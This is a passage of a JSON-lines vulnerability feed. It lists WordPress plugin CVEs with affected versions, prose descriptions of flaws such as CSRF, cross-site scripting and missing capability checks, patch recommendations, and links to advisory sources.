database.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/pull\\\/1654\\\/commits\\\/74647d42cc8d63f5d4f687efcd0792c246c23039\",\"name\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/pull\\\/1654\\\/commits\\\/74647d42cc8d63f5d4f687efcd0792c246c23039\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/trunk\\\/includes\\\/core\\\/class-member-directory.php#L1775\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/trunk\\\/includes\\\/core\\\/class-member-directory.php#L1775\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/trunk\\\/includes\\\/core\\\/class-member-directory.php#L1863\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/trunk\\\/includes\\\/core\\\/class-member-directory.php#L1863\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249862\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249862\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-member\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-member\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34adbae5-d615-4f8d-a845-6741d897f06c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34adbae5-d615-4f8d-a845-6741d897f06c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13768","slug":"cits-support-svg-webp-media-upload","versionImpact":"4.2","description":"The CITS Support svg, webp Media and TTF,OTF File Upload, Use Custom Fonts plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.2. This is due to missing or incorrect nonce validation on the cits_assign_fonts_tab() function. This makes it possible for unauthenticated attackers to delete font assignments via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cits-support-svg-webp-media-upload\\\/trunk\\\/includes\\\/cits-custom-fonts.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cits-support-svg-webp-media-upload\\\/trunk\\\/includes\\\/cits-custom-fonts.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea1f1825-241c-4060-a1e1-a13f92421fef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea1f1825-241c-4060-a1e1-a13f92421fef?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3520","slug":"avatar","versionImpact":"0.1.4","description":"The Avatar plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in a function in all versions up to, and including, 0.1.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/avatar\\\/trunk\\\/avatar.php#L417\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/avatar\\\/trunk\\\/avatar.php#L417\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/avatar\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/avatar\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01769760-5bfe-4352-bc5b-141f078c0b6d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01769760-5bfe-4352-bc5b-141f078c0b6d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0719","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_save_sort_order function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and perform actions intended for administrators such as modifying the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9b26604b-2423-4130-b0ef-8f63a392c760\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9b26604b-2423-4130-b0ef-8f63a392c760\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0589","slug":"wp-image-carousel","versionImpact":"1.0.2","description":"The WP Image Carousel WordPress plugin through 1.0.2 does not sanitise and escape some parameters, which could allow users with a role as low as contributor to perform Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58649228-69a6-4028-8487-166b0a07fcf7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58649228-69a6-4028-8487-166b0a07fcf7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2470","slug":"add-to-feedly","versionImpact":"1.2.11","description":"The Add to Feedly WordPress plugin through 1.2.11 does not sanitize and escape its settings, allowing high-privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/de0adf26-8a0b-4b90-96d5-4bec6e770e04\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/de0adf26-8a0b-4b90-96d5-4bec6e770e04\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0291","slug":"quiz-master-next","versionImpact":"8.0.8","description":"The Quiz And Survey Master for WordPress is vulnerable to authorization bypass due to a missing capability check on the function associated with the qsm_remove_file_fd_question AJAX action in versions up to, and including, 8.0.8. This makes it possible for unauthenticated attackers to delete arbitrary media files.","refs":"[{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/171011\\\/wpqsm808-xsrf.txt\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/171011\\\/wpqsm808-xsrf.txt\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2834471\\\/quiz-master-next\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2834471\\\/quiz-master-next\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68110321-db1a-4634-98cd-0afd3ec933b8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68110321-db1a-4634-98cd-0afd3ec933b8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/quiz-master-next\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/quiz-master-next\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1893","slug":"login-configurator","versionImpact":"2.1","description":"The Login Configurator WordPress plugin through 2.1 does not properly escape a URL parameter before outputting it to the page, leading to a reflected cross-site scripting vulnerability targeting site administrators.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dbe6cf09-971f-42e9-b744-9339454168c7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dbe6cf09-971f-42e9-b744-9339454168c7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1389","slug":"paid-member-subscriptions","versionImpact":"2.11.1","description":"The Paid Membership Subscriptions \u2013 Effortless Memberships, Recurring Payments & Content Restriction plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the pms_stripe_connect_handle_authorization_return function in all versions up to, and including, 2.11.1. This makes it possible for unauthenticated attackers to change the Stripe payment keys.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd5f5861-5be4-456d-915d-bafb7bff2110?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd5f5861-5be4-456d-915d-bafb7bff2110?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-member-subscriptions\\\/trunk\\\/includes\\\/gateways\\\/stripe\\\/admin\\\/functions-admin-connect.php#L11\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-member-subscriptions\\\/trunk\\\/includes\\\/gateways\\\/stripe\\\/admin\\\/functions-admin-connect.php#L11\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3034497%40paid-member-subscriptions%2Ftrunk&old=3031453%40paid-member-subscriptions%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3034497%40paid-member-subscriptions%2Ftrunk&old=3031453%40paid-member-subscriptions%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0591","slug":"wpdatatables","versionImpact":"3.4.2.2","description":"The wpDataTables \u2013 WordPress Data Table, Dynamic Tables & Table Charts Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'A' parameter in all versions up to, and including, 3.4.2.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a679863-3c22-4d34-9994-1f8ec121ad86?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a679863-3c22-4d34-9994-1f8ec121ad86?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wpdatatables\\\/trunk\\\/lib\\\/phpoffice\\\/phpspreadsheet\\\/\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wpdatatables\\\/trunk\\\/lib\\\/phpoffice\\\/phpspreadsheet\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wpdatatables\\\/trunk\\\/lib\\\/phpoffice\\\/phpspreadsheet\\\/samples\\\/Basic\\\/45_Quadratic_equation_solver.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wpdatatables\\\/trunk\\\/lib\\\/phpoffice\\\/phpspreadsheet\\\/samples\\\/Basic\\\/45_Quadratic_equation_solver.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3037741%40wpdatatables&new=3037741%40wpdatatables&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3037741%40wpdatatables&new=3037741%40wpdatatables&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4377","slug":"dop-shortcodes","versionImpact":"1.2","description":"The DOP Shortcodes WordPress plugin through 1.2 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/778cebec-bdbb-4538-9518-c5bd50f76961\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/778cebec-bdbb-4538-9518-c5bd50f76961\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7412","slug":"no-update-nag","versionImpact":"1.4.12","description":"The No Update Nag plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.4.12. This is due to the plugin allowing direct access to the bootstrap.php file which has display_errors on. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77faa23e-4475-43d9-b475-fe999cda7b62?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77faa23e-4475-43d9-b475-fe999cda7b62?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/no-update-nag\\\/trunk\\\/tests\\\/phpunit\\\/bootstrap.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/no-update-nag\\\/trunk\\\/tests\\\/phpunit\\\/bootstrap.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10854","slug":"buy-one-click-woocommerce","versionImpact":"2.2.9","description":"The Buy one click WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the buy_one_click_import_options AJAX action in all versions up to, and including, 2.2.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to import plugin settings.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3d9b755-1e6e-44ac-989a-201237f6dc9f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3d9b755-1e6e-44ac-989a-201237f6dc9f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/buy-one-click-woocommerce\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/buy-one-click-woocommerce\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12475","slug":"wp-multi-store-locator","versionImpact":"2.4.1","description":"The WP Multi Store Locator plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 2.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207533\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207533\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-multi-store-locator\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-multi-store-locator\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/089406e7-4f6a-416b-9077-e17c44069300?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/089406e7-4f6a-416b-9077-e17c44069300?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12620","slug":"animategl","versionImpact":"1.4.23","description":"The AnimateGL Animations for WordPress \u2013 Elementor & Gutenberg Blocks Animations plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'agl_json' AJAX action in all versions up to, and including, 1.4.23. This makes it possible for unauthenticated attackers to update the plugin's settings.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/animategl\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/animategl\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/841a028d-ff36-4e3f-903b-e25951648075?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/841a028d-ff36-4e3f-903b-e25951648075?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1463","slug":"wpgsi","versionImpact":"3.8.2","description":"The Spreadsheet Integration plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.8.2. This is due to improper nonce validation within the class-wpgsi-show.php script. This makes it possible for unauthenticated attackers to publish arbitrary posts, including private, granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpgsi\\\/trunk\\\/admin\\\/class-wpgsi-show.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpgsi\\\/trunk\\\/admin\\\/class-wpgsi-show.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250077\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250077\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250077\\\/#file352\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250077\\\/#file352\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpgsi\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpgsi\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/034ba83f-4ee3-40f1-a41a-8b3d0055a1ba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/034ba83f-4ee3-40f1-a41a-8b3d0055a1ba?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2613","slug":"customized-login","versionImpact":"2.0.5","description":"The Login Manager \u2013 Design Login Page, View Login Activity, Limit Login Attempts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Custom logo and background URLs in all versions up to, and including, 2.0.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/customized-login\\\/trunk\\\/customized-login.php#L199\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/customized-login\\\/trunk\\\/customized-login.php#L199\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2ea5e34-9303-43c8-8579-80ef02e1d9c4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2ea5e34-9303-43c8-8579-80ef02e1d9c4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-47670","slug":"miniorange-login-openid","versionImpact":"7.6.10","description":"Improper Control of Filename for Include\/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in miniOrange WordPress Social Login and Register allows PHP Local File Inclusion. This issue affects WordPress Social Login and Register: from n\/a through 7.6.10.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/miniorange-login-openid\\\/vulnerability\\\/wordpress-wordpress-social-login-and-register-7-6-9-local-file-inclusion-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/miniorange-login-openid\\\/vulnerability\\\/wordpress-wordpress-social-login-and-register-7-6-9-local-file-inclusion-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6488","slug":"ismobile","versionImpact":"1.1.1","description":"The isMobile plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018device\u2019 parameter in all versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3318334\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3318334\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ismobile\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ismobile\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1886db3-e01d-4cb1-8134-8cddff6503ac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1886db3-e01d-4cb1-8134-8cddff6503ac?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6895","slug":"melapress-login-security","description":"The Melapress Login Security plugin for WordPress is vulnerable to Authentication Bypass due to missing authorization within the get_valid_user_based_on_token() function in versions 2.1.0 to 2.1.1. This makes it possible for unauthenticated attackers who know an arbitrary user meta value to bypass authentication checks and log in as that user.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/melapress-login-security\\\/tags\\\/2.1.1\\\/app\\\/class-melapress-login-security.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/melapress-login-security\\\/tags\\\/2.1.1\\\/app\\\/class-melapress-login-security.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/melapress-login-security\\\/tags\\\/2.1.1\\\/app\\\/modules\\\/temporary-logins\\\/class-temporary-logins.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/melapress-login-security\\\/tags\\\/2.1.1\\\/app\\\/modules\\\/temporary-logins\\\/class-temporary-logins.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3328137\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3328137\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/melapress-login-security\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/melapress-login-security\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f65d5c4-6f53-4836-9130-c9f4ed3be893?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f65d5c4-6f53-4836-9130-c9f4ed3be893?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0712","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_move_object function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and perform actions intended for administrators such as modifying the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0be428ae-40ae-4cc0-82ad-d121b6d2d27e\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0be428ae-40ae-4cc0-82ad-d121b6d2d27e\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0505","slug":"ever-compare","versionImpact":"1.2.3","description":"The Ever Compare WordPress plugin through 1.2.3 does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dbabff3e-b021-49ed-aaf3-b73a77d4b354\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dbabff3e-b021-49ed-aaf3-b73a77d4b354\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-45831","slug":"amp-wp","versionImpact":"1.5.15","description":"Cross-Site Request Forgery (CSRF) vulnerability in the AMP WP \u2013 Google AMP For WordPress plugin by Pixelative (Mohsin Rafique), in versions up to and including 1.5.15.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/amp-wp\\\/wordpress-amp-wp-google-amp-for-wordpress-plugin-1-5-15-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/amp-wp\\\/wordpress-amp-wp-google-amp-for-wordpress-plugin-1-5-15-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5532","slug":"imagemapper","versionImpact":"1.2.6","description":"The ImageMapper plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.6. This is due to missing or incorrect nonce validation on the 'imgmap_save_area_title' function. This makes it possible for unauthenticated attackers to update the post title and inject malicious JavaScript via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a 